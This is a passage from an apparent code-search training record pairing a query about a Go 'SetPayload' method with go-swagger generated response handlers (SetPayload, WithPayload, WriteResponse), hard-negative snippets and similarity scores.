body.Unit == 6 || body.Unit == 7 || body.Unit == 8) {\n\t\t\terr = goa.MergeErrors(err, goa.InvalidEnumValueError(\"body.unit\", body.Unit, []interface{}{1, 2, 3, 4, 5, 6, 7, 8}))\n\t\t}\n\t\tif !(body.Type == 1 || body.Type == 2 || body.Type == 3 || body.Type == 4 || body.Type == 5 || body.Type == 6 || body.Type == 7 || body.Type == 8) {\n\t\t\terr = goa.MergeErrors(err, goa.InvalidEnumValueError(\"body.type\", body.Type, []interface{}{1, 2, 3, 4, 5, 6, 7, 8}))\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\tvar token string\n\t{\n\t\ttoken = productCreateToken\n\t}\n\tv := &product.CreatePayload{\n\t\tName: body.Name,\n\t\tUnit: body.Unit,\n\t\tCostPrice: body.CostPrice,\n\t\tMarketPrice: body.MarketPrice,\n\t\tNote: body.Note,\n\t\tImage: body.Image,\n\t\tCode: body.Code,\n\t\tSize: body.Size,\n\t\tType: body.Type,\n\t\tIsShelves: body.IsShelves,\n\t\tFounderID: body.FounderID,\n\t}\n\tv.Token = token\n\n\treturn v, nil\n}", "func (o *CreatePackageCreated) WithPayload(payload *models.Package) *CreatePackageCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *DeleteApiextensionsV1CollectionCustomResourceDefinitionOK) WithPayload(payload *models.IoK8sApimachineryPkgApisMetaV1Status) *DeleteApiextensionsV1CollectionCustomResourceDefinitionOK {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateOK) SetPayload(payload *models.Event) {\n\to.Payload = payload\n}", "func (r *CompanyItemCategoriesCollectionRequest) Add(ctx context.Context, reqObj *ItemCategory) (resObj *ItemCategory, err error) {\n\terr = r.JSONRequest(ctx, \"POST\", \"\", reqObj, &resObj)\n\treturn\n}", "func (o *CreateRbacAuthorizationV1NamespacedRoleOK) WithPayload(payload *models.IoK8sAPIRbacV1Role) *CreateRbacAuthorizationV1NamespacedRoleOK {\n\to.Payload = payload\n\treturn o\n}", "func (o *ReplaceExtensionsV1beta1NamespacedIngressCreated) WithPayload(payload *models.IoK8sAPIExtensionsV1beta1Ingress) *ReplaceExtensionsV1beta1NamespacedIngressCreated {\n\to.Payload = payload\n\treturn o\n}", "func (c *CharacterCreateCommand) Payload() *CharacterCreateCommandPayload {\n\treturn c.payload\n}", "func (o *ReplaceApiextensionsV1beta1CustomResourceDefinitionOK) WithPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) *ReplaceApiextensionsV1beta1CustomResourceDefinitionOK {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateCurrentAPISessionCertificateOK) WithPayload(payload *rest_model.CreateCurrentAPISessionCertificateEnvelope) *CreateCurrentAPISessionCertificateOK {\n\to.Payload = payload\n\treturn o\n}", "func (o *ClientPermissionCreateMethodNotAllowed) SetPayload(payload *ClientPermissionCreateMethodNotAllowedBody) {\n\to.Payload = payload\n}", "func (o *CreateExtensionsV1beta1NamespacedIngressCreated) WithPayload(payload *models.IoK8sAPIExtensionsV1beta1Ingress) *CreateExtensionsV1beta1NamespacedIngressCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *ReplacePolicyV1beta1NamespacedPodDisruptionBudgetCreated) SetPayload(payload *models.IoK8sAPIPolicyV1beta1PodDisruptionBudget) {\n\to.Payload = payload\n}", "func (o *CreateDocumentCreated) SetPayload(payload *internalmessages.Document) {\n\to.Payload = payload\n}", "func (o *CreateUserForbidden) WithPayload(payload *models.ErrorResponse) *CreateUserForbidden {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateZoneInternalServerError) WithPayload(payload *models.ErrorResponse) *CreateZoneInternalServerError {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateCoreV1NamespacedPodBindingCreated) SetPayload(payload *models.IoK8sAPICoreV1Binding) {\n\to.Payload = payload\n}", "func (o *CreateCoreV1NamespacedPodBindingOK) WithPayload(payload *models.IoK8sAPICoreV1Binding) *CreateCoreV1NamespacedPodBindingOK {\n\to.Payload = payload\n\treturn o\n}", "func (o *ReplaceRbacAuthorizationV1beta1NamespacedRoleCreated) SetPayload(payload *models.IoK8sAPIRbacV1beta1Role) {\n\to.Payload = payload\n}", "func (o *CreateFoldersCreated) WithPayload(payload *models.CreateFolderResp) *CreateFoldersCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *CreateDiscoveryV1beta1NamespacedEndpointSliceCreated) WithPayload(payload *models.IoK8sAPIDiscoveryV1beta1EndpointSlice) *CreateDiscoveryV1beta1NamespacedEndpointSliceCreated {\n\to.Payload = payload\n\treturn o\n}", "func CreateSubCategoryTemplateFromDiscriminatorValue(parseNode i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.Parsable, error) {\n return NewSubCategoryTemplate(), nil\n}", "func (o *PutSlideLikeCreated) SetPayload(payload models.Success) {\n\to.Payload = payload\n}", "func (o *GetSubCategoriesByCategoryParams) WriteToRequest(r runtime.ClientRequest, reg strfmt.Registry) error {\n\n\tif err := r.SetTimeout(o.timeout); err != nil {\n\t\treturn err\n\t}\n\tvar res []error\n\n\t// path param id\n\tif err := r.SetPathParam(\"id\", swag.FormatInt64(o.ID)); err != nil {\n\t\treturn err\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}" ]
[ "0.65292084", "0.5659147", "0.5402749", "0.5291293", "0.5193651", "0.51259524", "0.5121756", "0.5048872", "0.4986674", "0.49802187", "0.49666917", "0.49362504", "0.49362025", "0.49071783", "0.48970366", "0.48712412", "0.48694733", "0.48630476", "0.48542443", "0.4837587", "0.48183328", "0.4782773", "0.47689894", "0.4767157", "0.47586933", "0.475654", "0.47403187", "0.47350788", "0.47343507", "0.47198457", "0.47078094", "0.4702712", "0.46865132", "0.4679492", "0.46789604", "0.46752158", "0.46684363", "0.4667276", "0.46584445", "0.46515056", "0.46466643", "0.4636163", "0.4635385", "0.4620047", "0.46185875", "0.4614636", "0.4611754", "0.46077266", "0.4599839", "0.45889246", "0.45852306", "0.45829827", "0.45815966", "0.4556408", "0.45463333", "0.45412526", "0.45409334", "0.4539232", "0.45316324", "0.4496407", "0.44921103", "0.4489417", "0.4465126", "0.44611868", "0.4458616", "0.44508117", "0.44489035", "0.44435617", "0.4442867", "0.44310576", "0.4428748", "0.44284052", "0.44233686", "0.4422132", "0.44148314", "0.44090208", "0.4405974", "0.4405706", "0.44034716", "0.43897733", "0.43884167", "0.43873584", "0.43840033", "0.43826735", "0.43825552", "0.43817928", "0.43803158", "0.43709978", "0.43688375", "0.43683338", "0.43653634", "0.4363621", "0.43628925", "0.43500814", "0.43478242", "0.43458858", "0.43448436", "0.43365684", "0.43347418", "0.43305865" ]
0.730311
0
SetPayload sets the payload to the create sub category created response
func (o *CreateSubCategoryCreated) SetPayload(payload *models.SubCategory) { o.Payload = payload }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *PutSlideSuperlikeCreated) SetPayload(payload models.Success) {\n\to.Payload = payload\n}", "func (o *CreateSubCategoryCreated) WithPayload(payload *models.SubCategory) *CreateSubCategoryCreated {\n\to.Payload = payload\n\treturn o\n}", "func (o *ClientPermissionCreateInternalServerError) SetPayload(payload *ClientPermissionCreateInternalServerErrorBody) {\n\to.Payload = payload\n}", "func (o *CreateHPCResourceCreated) SetPayload(payload *models.CreatedResponse) {\n\to.Payload = payload\n}", "func (o *ReplaceApiextensionsV1beta1CustomResourceDefinitionCreated) SetPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) {\n\to.Payload = payload\n}", "func (o *CreateACLAccepted) SetPayload(payload *models.ACL) {\n\to.Payload = payload\n}", "func (o *CreateFoldersCreated) SetPayload(payload *models.CreateFolderResp) {\n\to.Payload = payload\n}", "func (o *CreateZoneCreated) SetPayload(payload *models.CreateZoneResponse) {\n\to.Payload = payload\n}", "func (o *CreateACLCreated) SetPayload(payload *models.ACL) {\n\to.Payload = payload\n}", "func (o *CreateClusterCreated) SetPayload(payload *models.Kluster) {\n\to.Payload = payload\n}", "func (o *DeleteApiextensionsV1CollectionCustomResourceDefinitionOK) SetPayload(payload *models.IoK8sApimachineryPkgApisMetaV1Status) {\n\to.Payload = payload\n}", "func (o *SetResourceCreated) SetPayload(payload *models.Resource) {\n\to.Payload = payload\n}", "func (o *PatchFoldersIDOK) SetPayload(payload *models.CreateFolderResp) {\n\to.Payload = payload\n}", "func (o *PutSlideLikeCreated) SetPayload(payload models.Success) {\n\to.Payload = payload\n}", "func (o *PatchApiextensionsV1beta1CustomResourceDefinitionStatusOK) SetPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) {\n\to.Payload = payload\n}", "func (o *PostOrderCreated) SetPayload(payload *models.OrderCreateResponse) {\n\to.Payload = payload\n}", "func (o *CreateRbacAuthorizationV1alpha1NamespacedRoleCreated) SetPayload(payload *models.IoK8sAPIRbacV1alpha1Role) {\n\to.Payload = payload\n}", "func (o *CreateCurrentAPISessionCertificateOK) SetPayload(payload *rest_model.CreateCurrentAPISessionCertificateEnvelope) {\n\to.Payload = payload\n}", "func (o *UpdateCatalogInternalServerError) SetPayload(payload string) {\n\to.Payload = payload\n}", "func (o *CreateOK) SetPayload(payload *models.Event) {\n\to.Payload = payload\n}", "func (o *ClientPermissionCreateOK) SetPayload(payload *ClientPermissionCreateOKBody) {\n\to.Payload = payload\n}", "func (o *WeaviateThingTemplatesCreateAccepted) SetPayload(payload *models.ThingTemplateGetResponse) {\n\to.Payload = payload\n}", "func (o *CreateCoreV1NamespacedServiceAccountTokenCreated) SetPayload(payload *models.IoK8sAPIAuthenticationV1TokenRequest) {\n\to.Payload = payload\n}", "func (o *ReplaceApiextensionsV1beta1CustomResourceDefinitionOK) SetPayload(payload *models.IoK8sApiextensionsApiserverPkgApisApiextensionsV1beta1CustomResourceDefinition) {\n\to.Payload = payload\n}", "func (o *CreateRbacAuthorizationV1NamespacedRoleCreated) SetPayload(payload *models.IoK8sAPIRbacV1Role) {\n\to.Payload = payload\n}", "func (o *AddOrgMembersV1InternalServerError) SetPayload(payload *model.StandardError) {\n\to.Payload = payload\n}", "func (o *AddRegionAZCreated) SetPayload(payload models.ULID) {\n\to.Payload = payload\n}", "func (o *CreateSpoeCreated) SetPayload(payload string) {\n\to.Payload = payload\n}", "func (o *CreateHPCResourceInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *CreateZoneInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *CreateTaskInternalServerError) SetPayload(payload interface{}) {\n\to.Payload = payload\n}", "func (o *AddReleasesCreated) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *AddRegionAZInternalServerError) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *DeletePostbyIDInternalServerError) SetPayload(payload *models.Response) {\n\to.Payload = payload\n}", "func (o *AddRegionAZOK) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *CreateCoreV1NamespacedPodBindingCreated) SetPayload(payload *models.IoK8sAPICoreV1Binding) {\n\to.Payload = payload\n}", "func (o *CreateRbacAuthorizationV1alpha1NamespacedRoleOK) SetPayload(payload *models.IoK8sAPIRbacV1alpha1Role) {\n\to.Payload = payload\n}", "func (o *GraphqlPostOK) SetPayload(payload *models.GraphQLResponse) {\n\to.Payload = payload\n}", "func (o *PostInteractionCreated) SetPayload(payload *models.ConsoleInteraction) {\n\to.Payload = payload\n}", "func (o *PostRegisterDetailsInternalServerError) SetPayload(payload *models.GeneralResponse) {\n\to.Payload = payload\n}", "func (o *GetGroupComputersOfComputerInternalServerError) SetPayload(payload *modelapi.Error) {\n\to.Payload = payload\n}", "func (o *DeleteOrganizationInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *CreateBatchV1NamespacedJobCreated) SetPayload(payload *models.IoK8sAPIBatchV1Job) {\n\to.Payload = payload\n}", "func (o *CreateStorageSSLCertificateCreated) SetPayload(payload *models.SslCertificate) {\n\to.Payload = payload\n}", "func (o *AddKeypairCreated) SetPayload(payload models.ULID) {\n\to.Payload = payload\n}", "func (o *ServiceAddCreated) SetPayload(payload *models.Service) {\n\to.Payload = payload\n}", "func (o *CreateDocumentCreated) SetPayload(payload *internalmessages.Document) {\n\to.Payload = payload\n}", "func (o *UpdateClusterInternalServerError) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *ReplaceAppsV1NamespacedReplicaSetScaleCreated) SetPayload(payload *models.IoK8sAPIAutoscalingV1Scale) {\n\to.Payload = payload\n}", "func (o *CreateUserInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *SemverGenerateCreated) SetPayload(payload *models.SemverTagSet) {\n\to.Payload = payload\n}", "func (o *CreateCurrentAPISessionCertificateUnauthorized) SetPayload(payload *rest_model.APIErrorEnvelope) {\n\to.Payload = payload\n}", "func (o *V1CreateHelloInternalServerError) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *CreateACLDefault) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *CreateRbacAuthorizationV1NamespacedRoleOK) SetPayload(payload *models.IoK8sAPIRbacV1Role) {\n\to.Payload = payload\n}", "func (o *AddOrgMembersV1Unauthorized) SetPayload(payload *model.StandardError) {\n\to.Payload = payload\n}", "func (o *CreateACLConflict) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *V1CreateHelloOK) SetPayload(payload *models.CreateHelloResponse) {\n\to.Payload = payload\n}", "func (o *ReplaceRbacAuthorizationV1beta1NamespacedRoleCreated) SetPayload(payload *models.IoK8sAPIRbacV1beta1Role) {\n\to.Payload = payload\n}", "func (o *DeletePostbyIDUnauthorized) SetPayload(payload *models.Response) {\n\to.Payload = payload\n}", "func (o *CreateCoordinationV1NamespacedLeaseCreated) SetPayload(payload *models.IoK8sAPICoordinationV1Lease) {\n\to.Payload = payload\n}", "func (o *AddKeypairInternalServerError) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *GetCharactersCharacterIDOpportunitiesInternalServerError) SetPayload(payload *models.GetCharactersCharacterIDOpportunitiesInternalServerErrorBody) {\n\to.Payload = payload\n}", "func (o *AddNamespaceToGroupUnauthorized) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *DeleteOfferingByIDInternalServerError) SetPayload(payload *models.ErrorModel) {\n\to.Payload = payload\n}", "func (o *UpdateClusterUnauthorized) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *GetServicesHaproxyRuntimeAclsIDOK) SetPayload(payload *models.ACLFile) {\n\to.Payload = payload\n}", "func (o *AddItemInternalServerError) SetPayload(payload string) {\n\to.Payload = payload\n}", "func (o *AddNewMaterialsForPostInternalServerError) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *DeleteRuntimeContainerInternalServerError) SetPayload(payload string) {\n\to.Payload = payload\n}", "func (o *GenerateCouponInternalServerError) SetPayload(payload string) {\n\to.Payload = payload\n}", "func (o *BookNewMedicalAppointmentOK) SetPayload(payload *models.Credential) {\n\to.Payload = payload\n}", "func (o *CreateTCPCheckConflict) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *CreateHPCResourceUnauthorized) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *AddConsumptionInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *PutProjectProjectNameStageStageNameServiceServiceNameResourceCreated) SetPayload(payload *models.Version) {\n\to.Payload = payload\n}", "func (o *PutProjectProjectNameStageStageNameResourceResourceURIBadRequest) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *PostInteractionInternalServerError) SetPayload(payload *models.APIError) {\n\to.Payload = payload\n}", "func (o *DeleteGroupByIDUnauthorized) SetPayload(payload *models.Error) {\n\to.Payload = payload\n}", "func (o *CreateCoreV1NamespacedServiceAccountTokenOK) SetPayload(payload *models.IoK8sAPIAuthenticationV1TokenRequest) {\n\to.Payload = payload\n}", "func (o *DeleteOrganizationUnauthorized) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *ObjectsClassPutInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *UpdateMoveTaskOrderPostCounselingInformationInternalServerError) SetPayload(payload interface{}) {\n\to.Payload = payload\n}", "func (o *CreateBackendSwitchingRuleCreated) SetPayload(payload *models.BackendSwitchingRule) {\n\to.Payload = payload\n}", "func (o *CreateAuthenticationV1beta1TokenReviewCreated) SetPayload(payload *models.IoK8sAPIAuthenticationV1beta1TokenReview) {\n\to.Payload = payload\n}", "func (o *CreateTCPCheckCreated) SetPayload(payload *models.TCPCheck) {\n\to.Payload = payload\n}", "func (o *CreateCurrentAPISessionCertificateBadRequest) SetPayload(payload *rest_model.APIErrorEnvelope) {\n\to.Payload = payload\n}", "func (o *PostRegisterDetailsUnauthorized) SetPayload(payload *models.GeneralResponse) {\n\to.Payload = payload\n}", "func (o *GraphqlPostInternalServerError) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *DeletePostbyIDOK) SetPayload(payload *models.Response) {\n\to.Payload = payload\n}", "func (o *PostRegisterDetailsOK) SetPayload(payload *models.GeneralResponse) {\n\to.Payload = payload\n}", "func (o *PostReposOwnerRepoGitRefsCreated) SetPayload(payload *models.HeadBranch) {\n\to.Payload = payload\n}", "func (o *ReplaceCertificatesV1CertificateSigningRequestCreated) SetPayload(payload *models.IoK8sAPICertificatesV1CertificateSigningRequest) {\n\to.Payload = payload\n}", "func (o *PostUserIDF2aUnauthorized) SetPayload(payload *models.Response) {\n\to.Payload = payload\n}", "func (o *CreateHPCResourceForbidden) SetPayload(payload *models.ErrorResponse) {\n\to.Payload = payload\n}", "func (o *PetUploadImageOK) SetPayload(payload *models.APIResponse) {\n\to.Payload = payload\n}", "func (o *GetDataContextTopologyUUIDNodeNodeUUIDOK) SetPayload(payload *models.TapiTopologyTopologyNode) {\n\to.Payload = payload\n}", "func (o *CreateCoreV1NamespacedPodBindingOK) SetPayload(payload *models.IoK8sAPICoreV1Binding) {\n\to.Payload = payload\n}", "func (o *ArtifactListerInternalServerError) SetPayload(payload *weles.ErrResponse) {\n\to.Payload = payload\n}", "func (o *GetChatroomsIDOK) SetPayload(payload *apimodel.Chatroom) {\n\to.Payload = payload\n}" ]
[ "0.6328343", "0.6283681", "0.62103945", "0.6195887", "0.61484605", "0.6141625", "0.60756665", "0.607248", "0.60694844", "0.6023221", "0.6005432", "0.597998", "0.59690493", "0.5965882", "0.5945944", "0.5940896", "0.5934345", "0.59289837", "0.5923078", "0.59091187", "0.5885831", "0.5880283", "0.5865756", "0.5860912", "0.5856085", "0.5848934", "0.5840349", "0.5829816", "0.5821413", "0.58200693", "0.5783918", "0.5749262", "0.57416654", "0.57409555", "0.5716873", "0.57093716", "0.56925344", "0.5692257", "0.5685017", "0.5683903", "0.5675995", "0.56759536", "0.5674997", "0.5666536", "0.5663209", "0.5657932", "0.56529546", "0.564991", "0.5641565", "0.5633673", "0.5633542", "0.5632329", "0.56202286", "0.56177753", "0.5617054", "0.56154096", "0.56081194", "0.56025296", "0.5599506", "0.55958325", "0.55941385", "0.55932784", "0.5592032", "0.55912083", "0.5590149", "0.5587558", "0.5587389", "0.5583996", "0.5576857", "0.55723", "0.5564271", "0.5560226", "0.5559953", "0.5559682", "0.55576605", "0.55566645", "0.55551726", "0.5550819", "0.55507743", "0.55499494", "0.55431116", "0.5541339", "0.55407643", "0.5538637", "0.55380946", "0.5537578", "0.553648", "0.55321085", "0.5531144", "0.5526922", "0.55246687", "0.5523488", "0.5522804", "0.55225927", "0.55222124", "0.55070823", "0.55068874", "0.5506359", "0.55014455", "0.5498445" ]
0.73931634
0
WriteResponse to the client
func (o *CreateSubCategoryCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) { rw.WriteHeader(201) if o.Payload != nil { payload := o.Payload if err := producer.Produce(rw, payload); err != nil { panic(err) // let the recovery middleware deal with this } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (r *Response) Write(w io.Writer) error", "func (c *Operation) writeResponse(rw http.ResponseWriter, status int, data []byte) { // nolint: unparam\n\trw.WriteHeader(status)\n\n\tif _, err := rw.Write(data); err != nil {\n\t\tlogger.Errorf(\"Unable to send error message, %s\", err)\n\t}\n}", "func WriteResponse(w http.ResponseWriter, mensaje string, code int) {\n\tmessage := myTypes.Respuesta{\n\t\tMessage: mensaje,\n\t}\n\tresponse, _ := json.Marshal(message)\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(code)\n\tw.Write(response)\n}", "func WriteResponse(w http.ResponseWriter, object interface{}, rerr *irma.RemoteError) {\n\tstatus, bts := JsonResponse(object, rerr)\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(status)\n\t_, err := w.Write(bts)\n\tif err != nil {\n\t\tLogWarning(errors.WrapPrefix(err, \"failed to write response\", 0))\n\t}\n}", "func (o *PingOK) WriteResponse(rw http.ResponseWriter, producer httpkit.Producer) {\n\n\trw.WriteHeader(200)\n}", "func WriteResponse(w http.ResponseWriter, v interface{}, statusCode int) {\n\tresBody, err := json.Marshal(v)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(statusCode)\n\t_, _ = w.Write(resBody)\n}", "func WriteResponse(w http.ResponseWriter, code int, object interface{}) {\n\tdata, err := json.Marshal(object)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(code)\n\tw.Write(data)\n}", "func (o *GetPingOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func writeResponse(body []byte, w *http.ResponseWriter) {\n\t(*w).Header().Set(\"Content-Type\", \"text/plain; charset=utf-8\")\n\t_, err := (*w).Write(body)\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t\t(*w).WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n}", "func WriteResponse(w http.ResponseWriter, code int, resp interface{}) error {\n\tj, err := json.Marshal(resp)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn err\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(code)\n\n\t_, err = w.Write(j)\n\treturn err\n}", "func writeResponse(w *http.ResponseWriter, res responseData, status int) {\n\tresJSON, err := json.Marshal(res)\n\tif err != nil {\n\t\thttp.Error(*w, \"Failed to parse struct `responseData` into JSON object\", http.StatusInternalServerError)\n\t}\n\n\t(*w).Header().Set(\"Content-Type\", \"application/json\")\n\t(*w).WriteHeader(status)\n\t(*w).Write(resJSON)\n}", "func WriteResponse(w http.ResponseWriter, d string) {\n\tw.WriteHeader(200)\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\tw.Write([]byte(d))\n\treturn\n}", "func (o *CreateFacilityUsersOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func writeResponse(w http.ResponseWriter, response Response) {\n\tjson, err := json.Marshal(&response)\n\n\tif err != nil {\n\t\tfmt.Fprint(w, \"There was an error processing the request.\")\n\t}\n\n\tcommon.Log(fmt.Sprintf(\"Returning response %s\", json))\n\tfmt.Fprintf(w, \"%s\", json)\n}", "func (o *CreateProgramOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *DepositNewFileOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UpdateMedicineOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *CreateTaskCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Location\n\n\tlocation := o.Location.String()\n\tif location != \"\" {\n\t\trw.Header().Set(\"Location\", location)\n\t}\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func writeResponse(r *http.Request, w http.ResponseWriter, code int, resp interface{}) {\n\n\t// Deal with CORS\n\tif origin := r.Header.Get(\"Origin\"); origin != \"\" {\n\t\tw.Header().Set(\"Access-Control-Allow-Origin\", origin)\n\t\tw.Header().Set(\"Access-Control-Allow-Methods\", \"DELETE, GET, HEAD, OPTIONS, POST, PUT\")\n\t\tw.Header().Set(\"Access-Control-Allow-Credentials\", \"true\")\n\t\t// Allow any headers\n\t\tif wantedHeaders := r.Header.Get(\"Access-Control-Request-Headers\"); wantedHeaders != \"\" {\n\t\t\tw.Header().Set(\"Access-Control-Allow-Headers\", wantedHeaders)\n\t\t}\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"text/plain; charset=utf-8\")\n\n\tb, err := json.Marshal(resp)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tfmt.Fprintln(w, `{\"error\":\"failed to marshal json\"}`)\n\t\treturn\n\t}\n\n\tw.WriteHeader(code)\n\tfmt.Fprintln(w, string(b))\n}", "func (o *VerifyAccountCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func writeResponse(w http.ResponseWriter, h int, p interface{}) {\n\t// I set the content type...\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t// ... I write the specified status code...\n\tw.WriteHeader(h)\n\t// ... and I write the response\n\tb, _ := json.Marshal(p)\n\tw.Write(b)\n}", "func (o *UpdateCatalogOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func (c *SwitchVersion) WriteResponse(rw http.ResponseWriter, rp runtime.Producer) {\n\tswitch c.Request.Method {\n\tcase http.MethodPost:\n\t\tc.postSwitchVersion(rw, rp)\n\tdefault:\n\t\tc.notSupported(rw, rp)\n\t}\n}", "func (o *PutRecordingsOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *BofaChkUpdateOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *VerifyHealthCredentialOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func WriteResponse(w http.ResponseWriter, code int, err error, data interface{}, t0 time.Time) {\n\tw.WriteHeader(code)\n\tresp := &Response{Data: data, Dur: fmt.Sprint(time.Since(t0)), OK: false}\n\tif code < 300 {\n\t\tresp.OK = true\n\t}\n\tif err != nil {\n\t\tresp.Err = err.Error()\n\t}\n\terr = json.NewEncoder(w).Encode(resp)\n\tif err != nil {\n\t\tlog.Infof(\"failed to json encode response: %v\", err)\n\t\tif _, err = w.Write([]byte(spew.Sdump(resp))); err != nil {\n\t\t\tlog.Infof(\"failed to write dump of response: %v\", err)\n\t\t}\n\t}\n}", "func (o *NewDiscoveryOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func writeResponse(data []byte, size int64, ctype string, w http.ResponseWriter) {\n\tw.Header().Set(\"Content-Type\", ctype)\n\tw.Header().Set(\"Content-Length\", fmt.Sprintf(\"%d\", size))\n\tw.Header().Set(\"Cache-Control\", \"no-transform,public,max-age=86400,s-maxage=2592000\")\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(data)\n}", "func writeResponse(w http.ResponseWriter, code int, object interface{}) {\n\tfmt.Println(\"writing response:\", code, object)\n\tdata, err := json.Marshal(object)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tw.Header().Set(\"content-type\", \"application/json\")\n\tw.WriteHeader(code)\n\tw.Write(data)\n}", "func writeResponse(w http.ResponseWriter, authZRes *authorization.Response) {\n\n\tdata, err := json.Marshal(authZRes)\n\tif err != nil {\n\t\tlog.Fatal(\"Failed to marshel authz response %q\", err.Error())\n\t} else {\n\t\tw.Write(data)\n\t}\n\n\tif authZRes == nil || authZRes.Err != \"\" {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t}\n}", "func (o *GetCharactersCharacterIDOpportunitiesOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Cache-Control\n\n\tcacheControl := o.CacheControl\n\tif cacheControl != \"\" {\n\t\trw.Header().Set(\"Cache-Control\", 